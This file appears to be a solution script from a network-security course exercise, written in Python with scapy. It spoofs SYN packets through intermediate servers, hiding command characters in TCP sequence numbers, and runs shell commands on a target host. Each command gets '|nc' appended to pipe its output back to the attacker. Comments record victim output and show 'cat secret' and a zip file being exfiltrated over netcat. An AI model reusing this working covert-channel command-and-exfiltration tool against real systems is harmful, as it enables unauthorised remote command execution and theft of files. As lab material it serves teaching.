first part of ex2

[pub/jan/netsec2.git] / exercise3 / generator.py

#!/usr/bin/env python

# disable IPv6 error message
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.WARN)

#send(IP(dst='127.0.0.1')/TCP(sport=1337))

# our pingback target
src = '192.168.67.115'
# our intermediate syn-servers
dst = ['192.168.67.200', '192.168.67.210', '192.168.67.220']
sport = 1337
dport = 80
# self
self = '192.168.67.26'
port = '1234'

def sendchar(dst, char):
    if char is not None:
        ip=IP(src=src,dst=dst)
        SYN=TCP(sport=sport,dport=dport,flags='S',seq=ord(char)-1)
        send(ip/SYN)

def run(cmd):
    cmd += "|nc "+self+" "+port+"\r"
    chunksize = 4
    chunklist = [ cmd[i:i+chunksize] for i in range(0, len(cmd), chunksize) ]
    for chunkid, chunk in enumerate(chunklist):
        curdst = chunkid % len(dst)
        for char in chunk:
            sendchar(dst[curdst], char)

#run("ip addr")
"""
 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:27:2b:f0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.67.115/24 brd 192.168.67.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe27:2bf0/64 scope link
       valid_lft forever preferred_lft forever
"""

#run("pwd")
"""
/home/nsa
"""

#run("ls")
"""
New Text Documnet.txt.zip
secret
"""

#run("cat secret") # copy file with 'nc -l 1234 > secret'
#run("cat *.zip") # copy file with 'nc -l 1234 > New\ Text\ Documnet.txt.zip'